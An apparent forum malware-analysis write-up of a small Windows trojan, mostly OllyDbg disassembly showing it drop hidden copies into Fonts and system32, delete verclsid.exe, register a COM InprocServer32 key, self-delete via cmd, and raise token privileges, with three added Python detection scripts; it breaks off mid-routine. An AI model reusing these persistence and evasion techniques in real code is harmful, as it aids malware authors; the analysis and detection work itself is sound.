Analysis of a small trojan
This post was last edited by missviola on 2009-12-31 10:36
【Title】Analysis of a small trojan
【Author】missviola
【Tools】PEiD, OD (OllyDbg)
【Platform】Windows XP
【Original download】In the attachment
【Declaration】Just out of interest, no other purpose. Where I have slipped up, corrections from the experts are welcome!
------------------------------------------------------------------------
【Process】PEiD shows the file is packed with UPX; it was unpacked directly with the UPX tool itself. After unpacking, PEiD identifies it as Microsoft Visual C++ 6.0, size 41077 bytes. Loaded into OD, the analysis is as follows:
Creating a thread:
00401AC9  |.  50               push eax                                    ; /pThreadId = 0012FF20
00401ACA  |.  56               push esi                                    ; |CreationFlags => 0
00401ACB  |.  FF75 08          push dword ptr [ebp+8]                      ; |pThreadParm
00401ACE  |.  68 43194000      push 00401943                               ; |ThreadFunction = CTFMON.00401943
00401AD3  |.  56               push esi                                    ; |StackSize => 0
00401AD4  |.  56               push esi                                    ; |pSecurity => NULL
00401AD5  |.  FF15 44304000    call dword ptr [<&KERNEL32.CreateThread>]   ; \CreateThread
Getting the Windows directory:
00401667  /$  55               push ebp
00401668  |.  8BEC             mov ebp, esp
0040166A  |.  81EC 08010000    sub esp, 108
00401670  |.  80A5 F8FEFFFF 00 and byte ptr [ebp-108], 0
00401677  |.  57               push edi
00401678  |.  6A 41            push 41
0040167A  |.  33C0             xor eax, eax
0040167C  |.  59               pop ecx
0040167D  |.  8DBD F9FEFFFF    lea edi, dword ptr [ebp-107]
00401683  |.  F3:AB            rep stos dword ptr es:[edi]
00401685  |.  8D85 F8FEFFFF    lea eax, dword ptr [ebp-108]
0040168B  |.  68 04010000      push 104                                    ; /BufSize = 104 (260.)
00401690  |.  50               push eax                                    ; |Buffer
00401691  |.  FF15 B4304000    call dword ptr [<&KERNEL32.GetWindowsDirectoryA>] ; \GetWindowsDirectoryA
00401697  |.  8D85 F8FEFFFF    lea eax, dword ptr [ebp-108]
Output: %SystemRoot%\Fonts\PACNkAWTwg4Cyb3e.Ttf
0040169D  |.  68 D0414000      push 004041D0                               ; /<%s> = "PACNkAWTwg4Cyb3e"
004016A2  |.  50               push eax                                    ; |<%s>
004016A3  |.  68 C0414000      push 004041C0                               ; |format = "%s\fOnts\%s.Ttf"
004016A8  |.  FF75 08          push dword ptr [ebp+8]                      ; |s
004016AB  |.  FF15 08314000    call dword ptr [<&MSVCRT.sprintf>]          ; \sprintf
Opening its own file:
00401CE9  |.  56               push esi                                    ; /hTemplateFile => NULL
00401CEA  |.  68 80000000      push 80                                     ; |Attributes = NORMAL
00401CEF  |.  6A 03            push 3                                      ; |Mode = OPEN_EXISTING
00401CF1  |.  56               push esi                                    ; |pSecurity => NULL
00401CF2  |.  6A 01            push 1                                      ; |ShareMode = FILE_SHARE_READ
00401CF4  |.  68 00000080      push 80000000                               ; |Access = GENERIC_READ
00401CF9  |.  FF75 08          push dword ptr [ebp+8]                      ; |FileName
00401CFC  |.  FF15 90304000    call dword ptr [<&KERNEL32.CreateFileA>]    ; \CreateFileA
Reading its own file:
00401D2D  |.  56               push esi                                    ; /pOverlapped
00401D2E  |.  FF75 0C          push dword ptr [ebp+C]                      ; |pBytesRead
00401D31  |.  FF75 08          push dword ptr [ebp+8]                      ; |BytesToRead
00401D34  |.  57               push edi                                    ; |Buffer
00401D35  |.  53               push ebx                                    ; |hFile
00401D36  |.  FF15 4C304000    call dword ptr [<&KERNEL32.ReadFile>]       ; \ReadFile
Creating the file PACNkAWTwg4Cyb3e.Ttf with the hidden attribute set:
00401D52  |.  56               push esi                                    ; /hTemplateFile => NULL
00401D53  |.  68 86000000      push 86                                     ; |Attributes = HIDDEN|SYSTEM|NORMAL
00401D58  |.  6A 04            push 4                                      ; |Mode = OPEN_ALWAYS
00401D5A  |.  56               push esi                                    ; |pSecurity => NULL
00401D5B  |.  56               push esi                                    ; |ShareMode => 0
00401D5C  |.  6A 02            push 2                                      ; |Access = 2
00401D5E  |.  8975 FC          mov dword ptr [ebp-4], esi                  ; |
00401D61  |.  FF75 08          push dword ptr [ebp+8]                      ; |FileName
00401D64  |.  FF15 90304000    call dword ptr [<&KERNEL32.CreateFileA>]    ; \CreateFileA
Writing the file:
00401D81  |.  56               push esi                                    ; /pOverlapped
00401D82  |.  50               push eax                                    ; |pBytesWritten
00401D83  |.  FF75 10          push dword ptr [ebp+10]                     ; |nBytesToWrite
00401D86  |.  FF75 0C          push dword ptr [ebp+C]                      ; |Buffer
00401D89  |.  57               push edi                                    ; |hFile
00401D8A  |.  FF15 94304000    call dword ptr [<&KERNEL32.WriteFile>]      ; \WriteFile
The output path is %SystemRoot%\system32\56BC86C7.dll:
004011EC  /$  55               push ebp
004011ED  |.  8BEC             mov ebp, esp
004011EF  |.  81EC 04010000    sub esp, 104
004011F5  |.  80A5 FCFEFFFF 00 and byte ptr [ebp-104], 0
004011FC  |.  57               push edi
004011FD  |.  6A 40            push 40
004011FF  |.  33C0             xor eax, eax
00401201  |.  59               pop ecx
00401202  |.  8DBD FDFEFFFF    lea edi, dword ptr [ebp-103]
00401208  |.  F3:AB            rep stos dword ptr es:[edi]
0040120A  |.  837D 18 00       cmp dword ptr [ebp+18], 0
0040120E  |.  66:AB            stos word ptr es:[edi]
00401210  |.  AA               stos byte ptr es:[edi]
00401211  |.  5F               pop edi
00401212  |.  74 47            je short 0040125B
00401214  |.  56               push esi
00401215  |.  8D85 FCFEFFFF    lea eax, dword ptr [ebp-104]
0040121B  |.  68 04010000      push 104                                    ; /BufSize = 104 (260.)
00401220  |.  50               push eax                                    ; |Buffer
00401221  |.  FF15 B4304000    call dword ptr [<&KERNEL32.GetWindowsDirectoryA>] ; \GetWindowsDirectoryA
00401227  |.  BE 38414000      mov esi, 00404138
0040122C  |.  8D85 FCFEFFFF    lea eax, dword ptr [ebp-104]
00401232  |.  56               push esi                                    ; /src => "\"
00401233  |.  50               push eax                                    ; |dest
00401234  |.  E8 B90C0000      call <jmp.&MSVCRT.strcat>                   ; \strcat
00401239  |.  8D85 FCFEFFFF    lea eax, dword ptr [ebp-104]
0040123F  |.  68 8C414000      push 0040418C                               ; /src = "system32"
00401244  |.  50               push eax                                    ; |dest
00401245  |.  E8 A80C0000      call <jmp.&MSVCRT.strcat>                   ; \strcat
0040124A  |.  8D85 FCFEFFFF    lea eax, dword ptr [ebp-104]
00401250  |.  56               push esi                                    ; /src => "\"
00401251  |.  50               push eax                                    ; |dest
00401252  |.  E8 9B0C0000      call <jmp.&MSVCRT.strcat>                   ; \strcat
00401257  |.  83C4 18          add esp, 18
0040125A  |.  5E               pop esi
0040125B  |>  FF75 14          push dword ptr [ebp+14]                     ; /<%s>
0040125E  |.  8D85 FCFEFFFF    lea eax, dword ptr [ebp-104]                ; |
00401264  |.  FF75 0C          push dword ptr [ebp+C]                      ; |<%s>
00401267  |.  50               push eax                                    ; |<%s>
00401268  |.  68 84414000      push 00404184                               ; |format = "%s%s.%s"
0040126D  |.  FF75 08          push dword ptr [ebp+8]                      ; |s
00401270  |.  FF15 08314000    call dword ptr [<&MSVCRT.sprintf>]          ; \sprintf
Creating the file 56BC86C7.dll with the hidden attribute set (same routine as above, called again):
00401D52  |.  56               push esi                                    ; /hTemplateFile => NULL
00401D53  |.  68 86000000      push 86                                     ; |Attributes = HIDDEN|SYSTEM|NORMAL
00401D58  |.  6A 04            push 4                                      ; |Mode = OPEN_ALWAYS
00401D5A  |.  56               push esi                                    ; |pSecurity => NULL
00401D5B  |.  56               push esi                                    ; |ShareMode => 0
00401D5C  |.  6A 02            push 2                                      ; |Access = 2
00401D5E  |.  8975 FC          mov dword ptr [ebp-4], esi                  ; |
00401D61  |.  FF75 08          push dword ptr [ebp+8]                      ; |FileName
00401D64  |.  FF15 90304000    call dword ptr [<&KERNEL32.CreateFileA>]    ; \CreateFileA
Writing the file:
00401D81  |.  56               push esi                                    ; /pOverlapped
00401D82  |.  50               push eax                                    ; |pBytesWritten
00401D83  |.  FF75 10          push dword ptr [ebp+10]                     ; |nBytesToWrite
00401D86  |.  FF75 0C          push dword ptr [ebp+C]                      ; |Buffer
00401D89  |.  57               push edi                                    ; |hFile
00401D8A  |.  FF15 94304000    call dword ptr [<&KERNEL32.WriteFile>]      ; \WriteFile
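The drop routine above writes the bytes it just read from its own image into %SystemRoot%\fOnts\PACNkAWTwg4Cyb3e.Ttf (the format string mixes case, but NTFS paths are case-insensitive, so the file lands in the real Fonts directory) and creates it with attributes 0x86. The following is an added example, not code from the original post or from the sample: an offline triage that flags a "font" in that directory whose leading bytes are not a font container, or which carries HIDDEN|SYSTEM. The directory listing is constructed; that the dropped .Ttf starts with an MZ header is an assumption drawn from the read-own-file / write-file sequence, not something the post states.

```python
"""Offline triage for the Fonts-directory decoy used by the dropper above.

Added example, not code from the original post or from the sample. The
directory listing below is constructed; the 'MZ' head on the .Ttf entry is an
assumption drawn from the read-own-file / write-file sequence in the listing.
"""

# FILE_ATTRIBUTE_* bits (winnt.h). The CreateFileA call passes 0x86, i.e.
# HIDDEN | SYSTEM | NORMAL.
ATTRIBUTE_NAMES = {
    0x01: "READONLY", 0x02: "HIDDEN", 0x04: "SYSTEM",
    0x10: "DIRECTORY", 0x20: "ARCHIVE", 0x80: "NORMAL",
}
FILE_ATTRIBUTE_HIDDEN = 0x02
FILE_ATTRIBUTE_SYSTEM = 0x04

# Leading bytes of genuine font containers (TrueType/OpenType specifications).
FONT_MAGICS = {
    b"\x00\x01\x00\x00": "TrueType",
    b"true": "TrueType (Apple)",
    b"OTTO": "OpenType (CFF)",
    b"ttcf": "TrueType collection",
}
FONT_EXTENSIONS = {".ttf", ".ttc", ".otf", ".fon"}

# Constructed listing entries: (path, attribute mask, first bytes of content).
SAMPLE_LISTING = [
    (r"C:\WINDOWS\fOnts\PACNkAWTwg4Cyb3e.Ttf", 0x86, b"MZ\x90\x00\x03\x00"),
    (r"C:\WINDOWS\Fonts\arial.ttf", 0x20, b"\x00\x01\x00\x00\x00\x1b"),
    (r"C:\WINDOWS\Fonts\desktop.ini", 0x06, b"[.ShellClassInfo]"),
    (r"C:\WINDOWS\system32\56BC86C7.dll", 0x86, b"MZ\x90\x00"),
]


def decode_attributes(mask):
    """Names of the FILE_ATTRIBUTE_* bits set in `mask`, lowest bit first."""
    return [name for bit, name in sorted(ATTRIBUTE_NAMES.items()) if mask & bit]


def sniff(head):
    """Classify content by its first bytes: PE image, known font, or unknown."""
    if head[:2] == b"MZ":
        return "PE executable"
    return FONT_MAGICS.get(head[:4], "unknown")


def split_path(path):
    """Split a Windows path into (directory, basename) on the last backslash."""
    directory, _, name = path.rpartition("\\")
    return directory, name


def in_fonts_dir(path, system_root=r"C:\WINDOWS"):
    """Case-insensitive test for %SystemRoot%\\Fonts, so 'fOnts' matches too."""
    directory, _ = split_path(path)
    return directory.lower() == (system_root + r"\Fonts").lower()


def triage(path, attributes, head, system_root=r"C:\WINDOWS"):
    """Return the reasons a font-named entry in the Fonts directory looks planted."""
    reasons = []
    if not in_fonts_dir(path, system_root):
        return reasons
    _, name = split_path(path)
    extension = name[name.rfind("."):].lower() if "." in name else ""
    if extension not in FONT_EXTENSIONS:
        return reasons  # desktop.ini and friends are out of scope here
    kind = sniff(head)
    if kind not in FONT_MAGICS.values():
        reasons.append(f"{name}: extension {extension} but content is {kind}")
    if attributes & FILE_ATTRIBUTE_HIDDEN and attributes & FILE_ATTRIBUTE_SYSTEM:
        reasons.append(f"{name}: attributes {attributes:#x} = "
                       + "|".join(decode_attributes(attributes)))
    return reasons


def scan(listing, system_root=r"C:\WINDOWS"):
    """Map each flagged path to its reasons; clean entries are omitted."""
    findings = {}
    for path, attributes, head in listing:
        reasons = triage(path, attributes, head, system_root)
        if reasons:
            findings[path] = reasons
    return findings


if __name__ == "__main__":
    for flagged_path, flagged_reasons in scan(SAMPLE_LISTING).items():
        print(flagged_path)
        for reason in flagged_reasons:
            print("  -", reason)
```

On a live host the same checks would run over the output of `dir /a %SystemRoot%\Fonts` plus the first bytes of each file; the attribute test alone is weak (Windows keeps a HIDDEN|SYSTEM desktop.ini in Fonts), which is why the script only raises it for font-named files.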
Loading 56BC86C7.DLL, getting the address of the function JUFNdB4pARSJ and calling it:
004013CC  /$  FF7424 04        push dword ptr [esp+4]                      ; /FileName = "C:\WINDOWS\system32\56BC86C7.dll"
004013D0  |.  FF15 A0304000    call dword ptr [<&KERNEL32.LoadLibraryA>]   ; \LoadLibraryA
004013D6  |.  85C0             test eax, eax
004013D8  |.  74 12            je short 004013EC
004013DA  |.  68 98414000      push 00404198                               ; /ProcNameOrOrdinal = "JUFndB4pARSJ"
004013DF  |.  50               push eax                                    ; |hModule
004013E0  |.  FF15 A4304000    call dword ptr [<&KERNEL32.GetProcAddress>] ; \GetProcAddress
004013E6  |.  85C0             test eax, eax
004013E8  |.  74 02            je short 004013EC
004013EA  |.  FFD0             call eax
004013EC  \>  C2 0400          retn 4
Deleting %SystemRoot%\system32\verclsid.exe:
00401173  |.  50               push eax                                    ; /pFindFileData
00401174  |.  8D85 FCFEFFFF    lea eax, dword ptr [ebp-104]                ; |
0040117A  |.  50               push eax                                    ; |FileName
0040117B  |.  FF15 BC304000    call dword ptr [<&KERNEL32.FindFirstFileA>] ; \FindFirstFileA
00401181  |.  83F8 FF          cmp eax, -1
00401184  |.  74 18            je short 0040119E
00401186  |.  8D85 FCFEFFFF    lea eax, dword ptr [ebp-104]
0040118C  |.  50               push eax                                    ; /FileName
0040118D  |.  FF15 C0304000    call dword ptr [<&KERNEL32.DeleteFileA>]    ; \DeleteFileA
Creating the registry key HKEY_CLASSES_ROOT\CLSID\{56BC86C7-0692-4F94-A2C1-6CF1DBF8096C}\InprocServer32:
00401CA9  |.  50               push eax                                    ; /pHandle
00401CAA  |.  FF75 0C          push dword ptr [ebp+C]                      ; |Subkey
00401CAD  |.  FF75 08          push dword ptr [ebp+8]                      ; |hKey
00401CB0  |.  FF15 2C304000    call dword ptr [<&ADVAPI32.RegCreateKeyA>]  ; \RegCreateKeyA
Setting the values (the same RegSetValueExA wrapper is called twice):
00401CC3  |.  50               push eax                                    ; /BufSize
00401CC4  |.  FF75 14          push dword ptr [ebp+14]                     ; |Buffer
00401CC7  |.  6A 01            push 1                                      ; |ValueType = REG_SZ
00401CC9  |.  6A 00            push 0                                      ; |Reserved = 0
00401CCB  |.  FF75 10          push dword ptr [ebp+10]                     ; |ValueName
00401CCE  |.  FF75 0C          push dword ptr [ebp+C]                      ; |hKey
00401CD1  |.  FF15 20304000    call dword ptr [<&ADVAPI32.RegSetValueExA>] ; \RegSetValueExA
00401CC3  |.  50               push eax                                    ; /BufSize
00401CC4  |.  FF75 14          push dword ptr [ebp+14]                     ; |Buffer
00401CC7  |.  6A 01            push 1                                      ; |ValueType = REG_SZ
00401CC9  |.  6A 00            push 0                                      ; |Reserved = 0
00401CCB  |.  FF75 10          push dword ptr [ebp+10]                     ; |ValueName
00401CCE  |.  FF75 0C          push dword ptr [ebp+C]                      ; |hKey
00401CD1  |.  FF15 20304000    call dword ptr [<&ADVAPI32.RegSetValueExA>] ; \RegSetValueExA
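The sequence above (delete verclsid.exe, then register CLSID\{56BC86C7-...}\InprocServer32 with two REG_SZ values) is the registration of an in-process COM server. verclsid.exe is the shell-extension verifier Explorer runs to vet a CLSID before loading its in-process DLL, so removing it first is consistent with wanting the new DLL loaded unchecked; that reading is an inference added here, not something the post states. The following is an added example, not code from the original post: it parses a .reg export and flags InprocServer32 entries that look like this sample's. The value names and data in the constructed export are assumptions (the post shows them only in a screenshot), and the shell32 entry is a benign control.

```python
"""Parse a .reg export and flag in-process COM servers registered the way the
trojan above does (CLSID\\{...}\\InprocServer32 pointing at its dropped DLL).

Added example, not code from the original post. The value names and data in
SAMPLE_REG are assumptions: the post shows them only in a screenshot, and the
shell32 entry is a benign control.
"""
import re

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{56BC86C7-0692-4F94-A2C1-6CF1DBF8096C}]

[HKEY_CLASSES_ROOT\CLSID\{56BC86C7-0692-4F94-A2C1-6CF1DBF8096C}\InprocServer32]
@="C:\\WINDOWS\\system32\\56BC86C7.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-000000000046}\InprocServer32]
@="C:\\WINDOWS\\system32\\shell32.dll"
"ThreadingModel"="Apartment"
"""

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]\s*$")
VALUE_RE = re.compile(r'^(?P<name>@|"(?:[^"\\]|\\.)*")=(?P<data>.*)$')
INPROC_RE = re.compile(
    r"\\CLSID\\\{(?P<clsid>[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})\}\\InprocServer32$",
    re.IGNORECASE,
)


def unquote(data):
    """Strip the quotes of a REG_SZ literal and undo .reg escaping."""
    if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
        return data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return data


def parse_reg(text):
    """Minimal .reg parser: {key path: {value name: data}}; '@' is the default."""
    keys, current = {}, None
    for line in text.splitlines():
        key_match = KEY_RE.match(line)
        if key_match:
            current = key_match.group("key")
            keys.setdefault(current, {})
            continue
        value_match = VALUE_RE.match(line)
        if value_match and current is not None:
            name = value_match.group("name")
            name = "@" if name == "@" else name[1:-1]
            keys[current][name] = unquote(value_match.group("data"))
    return keys


def inproc_servers(keys):
    """Yield (CLSID, DLL path, ThreadingModel) for each InprocServer32 key."""
    for key, values in keys.items():
        match = INPROC_RE.search(key)
        if match and "@" in values:
            yield match.group("clsid").upper(), values["@"], values.get("ThreadingModel")


def suspicious(clsid, dll_path):
    """Heuristics matching this sample: the DLL stem equals the CLSID's first
    hex group, and/or the DLL name is bare hex. Neither proves malice on its
    own; a real hunt would also check file age and signature."""
    base = dll_path.rpartition("\\")[2]
    stem = base.rsplit(".", 1)[0]
    reasons = []
    if stem.upper() == clsid.split("-")[0]:
        reasons.append("DLL named after the CLSID's first group")
    if re.fullmatch(r"[0-9A-F]{8}\.dll", base, re.IGNORECASE):
        reasons.append("DLL name is eight hex digits")
    return reasons


def audit(text):
    """Map each suspicious CLSID to (DLL path, reasons)."""
    findings = {}
    for clsid, path, _ in inproc_servers(parse_reg(text)):
        reasons = suspicious(clsid, path)
        if reasons:
            findings[clsid] = (path, reasons)
    return findings


if __name__ == "__main__":
    for clsid, (path, reasons) in audit(SAMPLE_REG).items():
        print(f"{{{clsid}}} -> {path}: {'; '.join(reasons)}")
```

A real export (`reg export HKCR\CLSID clsid.reg`) is UTF-16 and much larger, but the same two regexes cover it; the parser deliberately ignores hex(...) and dword values because only the REG_SZ server path matters here.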
Deleting itself:
004016C1  /$  55               push ebp
004016C2  |.  8BEC             mov ebp, esp
004016C4  |.  81EC 08020000    sub esp, 208
004016CA  |.  53               push ebx
004016CB  |.  57               push edi
004016CC  |.  BF 04010000      mov edi, 104
004016D1  |.  8D85 F8FDFFFF    lea eax, dword ptr [ebp-208]
004016D7  |.  57               push edi                                    ; /BufSize => 104 (260.)
004016D8  |.  33DB             xor ebx, ebx                                ; |
004016DA  |.  50               push eax                                    ; |PathBuffer
004016DB  |.  53               push ebx                                    ; |hModule => NULL
004016DC  |.  FF15 AC304000    call dword ptr [<&KERNEL32.GetModuleFileNameA>] ; \GetModuleFileNameA
004016E2  |.  85C0             test eax, eax
004016E4  |.  0F84 B8000000    je 004017A2
004016EA  |.  8D85 F8FDFFFF    lea eax, dword ptr [ebp-208]
004016F0  |.  57               push edi                                    ; /MaxShortPathSize => 104 (260.)
004016F1  |.  50               push eax                                    ; |ShortPath
004016F2  |.  8D85 F8FDFFFF    lea eax, dword ptr [ebp-208]                ; |
004016F8  |.  50               push eax                                    ; |LongPath
004016F9  |.  FF15 7C304000    call dword ptr [<&KERNEL32.GetShortPathNameA>] ; \GetShortPathNameA
004016FF  |.  85C0             test eax, eax
00401701  |.  0F84 9B000000    je 004017A2
00401707  |.  56               push esi
00401708  |.  8D85 FCFEFFFF    lea eax, dword ptr [ebp-104]
0040170E  |.  68 FC414000      push 004041FC                               ; /String2 = "/c"
00401713  |.  50               push eax                                    ; |String1
00401714  |.  FF15 80304000    call dword ptr [<&KERNEL32.lstrcpyA>]       ; \lstrcpyA
0040171A  |.  8B35 84304000    mov esi, dword ptr [<&KERNEL32.lstrcatA>]   ; kernel32.lstrcatA
00401720  |.  8D85 FCFEFFFF    lea eax, dword ptr [ebp-104]
00401726  |.  68 F8414000      push 004041F8                               ; /StringToAdd = " d"
0040172B  |.  50               push eax                                    ; |ConcatString
0040172C  |.  FFD6             call esi                                    ; \lstrcatA
0040172E  |.  8D85 FCFEFFFF    lea eax, dword ptr [ebp-104]
00401734  |.  68 10414000      push 00404110                               ; /StringToAdd = "e"
00401739  |.  50               push eax                                    ; |ConcatString
0040173A  |.  FFD6             call esi                                    ; \lstrcatA
0040173C  |.  8D85 FCFEFFFF    lea eax, dword ptr [ebp-104]
00401742  |.  68 F4414000      push 004041F4                               ; /StringToAdd = "l"
00401747  |.  50               push eax                                    ; |ConcatString
00401748  |.  FFD6             call esi                                    ; \lstrcatA
0040174A  |.  8D85 F8FDFFFF    lea eax, dword ptr [ebp-208]
00401750  |.  50               push eax                                    ; /StringToAdd (the short path built above)
00401751  |.  8D85 FCFEFFFF    lea eax, dword ptr [ebp-104]                ; |
00401757  |.  50               push eax                                    ; |ConcatString
00401758  |.  FFD6             call esi                                    ; \lstrcatA
0040175A  |.  8D85 FCFEFFFF    lea eax, dword ptr [ebp-104]
00401760  |.  68 EC414000      push 004041EC                               ; /StringToAdd = " >> nul"
00401765  |.  50               push eax                                    ; |ConcatString
00401766  |.  FFD6             call esi                                    ; \lstrcatA
00401768  |.  8D85 F8FDFFFF    lea eax, dword ptr [ebp-208]
0040176E  |.  57               push edi                                    ; /BufSize => 104 (260.)
0040176F  |.  50               push eax                                    ; |Buffer
00401770  |.  68 E4414000      push 004041E4                               ; |Name = "comspec"
00401775  |.  FF15 88304000    call dword ptr [<&KERNEL32.GetEnvironmentVariableA>] ; \GetEnvironmentVariableA
0040177B  |.  85C0             test eax, eax
0040177D  |.  5E               pop esi
0040177E  |.  74 22            je short 004017A2
00401780  |.  53               push ebx                                    ; /IsShown => 0
00401781  |.  8D85 FCFEFFFF    lea eax, dword ptr [ebp-104]                ; |
00401787  |.  53               push ebx                                    ; |DefDir => NULL
00401788  |.  50               push eax                                    ; |Parameters
00401789  |.  8D85 F8FDFFFF    lea eax, dword ptr [ebp-208]                ; |
0040178F  |.  50               push eax                                    ; |FileName
00401790  |.  53               push ebx                                    ; |Operation => NULL
00401791  |.  53               push ebx                                    ; |hWnd => NULL
00401792  |.  FF15 44314000    call dword ptr [<&SHELL32.ShellExecuteA>]   ; \ShellExecuteA
00401798  |.  83F8 20          cmp eax, 20
0040179B  |.  7E 05            jle short 004017A2
0040179D  |.  6A 01            push 1
0040179F  |.  58               pop eax
004017A0  |.  EB 02            jmp short 004017A4
004017A2  |>  33C0             xor eax, eax
004017A4  |>  5F               pop edi
004017A5  |.  5B               pop ebx
004017A6  |.  C9               leave
004017A7  \.  C3               retn
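The routine above assembles "/c" + " d" + "e" + "l" + " " + the 8.3 short path of its own image + " >> nul" and hands that to %COMSPEC% through ShellExecuteA with the window hidden (IsShown = 0), so cmd.exe deletes the dropper after it exits. In process-creation telemetry this appears as cmd.exe whose parent is the very file its command line deletes, often under an 8.3 alias such as DOCUME~1. The following is an added example, not code from the original post: a hunt over constructed Sysmon-style events that matches the del target against the parent image, including the 8.3 alias case. The parent name ctfmon.exe follows the module name OllyDbg shows (CTFMON) and is otherwise an assumption.

```python
"""Hunt for the self-delete pattern above: the dropper resolves %COMSPEC%,
builds '/c del <8.3 short path of itself> >> nul' and runs it hidden via
ShellExecuteA. In process-creation telemetry that shows up as cmd.exe whose
parent is the very file the command deletes.

Added example, not code from the original post. The events below are
constructed in a Sysmon-like shape; the parent name ctfmon.exe follows the
module name OllyDbg shows (CTFMON) and is otherwise an assumption.
"""
import re

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Documents and Settings\user\Desktop\ctfmon.exe",
     "Image": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": r"C:\WINDOWS\system32\cmd.exe /c del C:\DOCUME~1\user\Desktop\ctfmon.exe >> nul"},
    {"ParentImage": r"C:\WINDOWS\explorer.exe",
     "Image": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": r'cmd.exe /c del "C:\temp\report.tmp"'},
    {"ParentImage": r"C:\tools\build.exe",
     "Image": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": r"cmd /c dir C:\tools"},
]

# '/c del [switches] <target>' where the target may be quoted; the trailing
# '>> nul' redirection is simply not captured.
DEL_RE = re.compile(
    r'\s/c\s+(?:del|erase)\s+(?:/[a-z]\s+)*(?:"(?P<quoted>[^"]+)"|(?P<bare>\S+))',
    re.IGNORECASE,
)
# An 8.3 alias stem: up to six characters, a tilde and a number (DOCUME~1).
SHORT_STEM_RE = re.compile(r"^(?P<stem>[^~\\]{1,6})~\d+$")


def del_target(cmdline):
    """Path argument of a 'del' in a cmd /c command line, or None."""
    match = DEL_RE.search(cmdline)
    if not match:
        return None
    return match.group("quoted") or match.group("bare")


def component_matches(short, long_name):
    """True if `short` equals `long_name` or is a plausible 8.3 alias of it.

    8.3 generation keeps the first six filesystem-legal characters of the
    upper-cased stem (spaces dropped) and the first three of the extension."""
    if short.lower() == long_name.lower():
        return True
    short_stem, _, short_ext = short.rpartition(".")
    if not short_stem:
        short_stem, short_ext = short, ""
    alias = SHORT_STEM_RE.match(short_stem)
    if not alias:
        return False
    long_stem, _, long_ext = long_name.rpartition(".")
    if not long_stem:
        long_stem, long_ext = long_name, ""
    legal = re.sub(r"[^A-Z0-9$%'\-_@~`!(){}^#&]", "", long_stem.upper())
    stem = alias.group("stem").upper()
    return legal[:6][:len(stem)] == stem and long_ext[:3].upper() == short_ext.upper()


def deletes_own_parent(event):
    """cmd.exe deleting the image of the process that spawned it."""
    if not event["Image"].lower().endswith("\\cmd.exe"):
        return False
    target = del_target(event["CommandLine"])
    if target is None:
        return False
    target_parts = target.split("\\")
    parent_parts = event["ParentImage"].split("\\")
    return len(target_parts) == len(parent_parts) and all(
        component_matches(t, p) for t, p in zip(target_parts, parent_parts))


def hunt(events):
    """Parent images that had themselves deleted through cmd.exe."""
    return [e["ParentImage"] for e in events if deletes_own_parent(e)]


if __name__ == "__main__":
    for parent in hunt(SAMPLE_EVENTS):
        print("self-delete via cmd.exe:", parent)
```

Two caveats for live use: if 8.3 name creation is disabled on the volume, GetShortPathNameA returns the long path unchanged and only the plain comparison is needed; and the `>> nul` is cosmetic (del prints nothing on success), so do not key a rule on it.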
DLL analysis:
Raising privileges:
10005A24   55               push ebp
10005A25   8BEC             mov ebp, esp
10005A27   83EC 2C          sub esp, 2C
10005A2A   53               push ebx
10005A2B   56               push esi
10005A2C   57               push edi
10005A2D   6A 10            push 10
10005A2F   5F               pop edi
10005A30   8D45 08          lea eax, dword ptr [ebp+8]
10005A33   50               push eax
10005A34   6A 28            push 28
10005A36   FF75 08          push dword ptr [ebp+8]
10005A39   897D FC          mov dword ptr [ebp-4], edi
10005A3C   FF15 2C700010    call dword ptr [1000702C]                    ; ADVAPI32.OpenProcessToken
10005A42   85C0             test eax, eax
10005A44   74 78            je short 10005ABE
10005A46   8D45 F4          lea eax, dword ptr [ebp-C]
10005A49   33F6             xor esi, esi
10005A4B   50               push eax
10005A4C   FF75 0C          push dword ptr [ebp+C]
10005A4F   56               push esi
10005A50   FF15 28700010    call dword ptr [10007028]                    ; ADVAPI32.LookupPrivilegeValueA
10005A56   85C0             test eax, eax
10005A58   74 64            je short 10005ABE
10005A5A   8B45 F4          mov eax, dword ptr [ebp-C]
10005A5D   6A 01            push 1
10005A5F   8945 D8          mov dword ptr [ebp-28], eax
10005A62   8B45 F8          mov eax, dword ptr [ebp-8]
10005A65   8945 DC          mov dword ptr [ebp-24], eax
10005A68   5B               pop ebx
10005A69   8D45 FC          lea eax, dword ptr [ebp-4]
10005A6C   8975 E0          mov dword ptr [ebp-20], esi
10005A6F   50               push eax
10005A70   8D45 E4          lea eax, dword ptr [ebp-1C]
10005A73   50               push eax
10005A74   8D45 D4          lea eax, dword ptr [ebp-2C]
10005A77   57               push edi
10005A78   50               push eax
10005A79   56               push esi
10005A7A   8B35 24700010    mov esi, dword ptr [10007024]                ; ADVAPI32.AdjustTokenPrivileges
10005A80   FF75 08          push dword ptr [ebp+8]
10005A83   895D D4          mov dword ptr [ebp-2C], ebx
10005A86   FFD6             call esi
10005A88   8B3D 9C700010    mov edi, dword ptr [1000709C]                ; ntdll.RtlGetLastWin32Error
10005A8E   FFD7             call edi
10005A90   85C0             test eax, eax
10005A92   75 2A            jnz short 10005ABE
10005A94   8B45 F4          mov eax, dword ptr [ebp-C]
10005A97   834D F0 02       or dword ptr [ebp-10], 2
10005A9B   8945 E8          mov dword ptr [ebp-18], eax
10005A9E   8B45 F8          mov eax, dword ptr [ebp-8]
10005AA1   8945 EC          mov dword ptr [ebp-14], eax
10005AA4   33C0             xor eax, eax
10005AA6   50               push eax
10005AA7   50               push eax
10005AA8   FF75 FC          push dword ptr [ebp-4]
10005AAB   8D4D E4          lea ecx, dword ptr [ebp-1C]
10005AAE   895D E4          mov dword ptr [ebp-1C], ebx
10005AB1   51               push ecx
10005AB2   50               push eax
10005AB3   FF75 08          push dword ptr [ebp+8]
10005AB6   FFD6             call esi
10005AB8   FFD7             call edi
10005ABA   85C0             test eax, eax
10005ABC   74 04            je short 10005AC2
10005ABE   33C0             xor eax, eax
10005AC0   EB 0B            jmp short 10005ACD
10005AC2   FF75 08          push dword ptr [ebp+8]
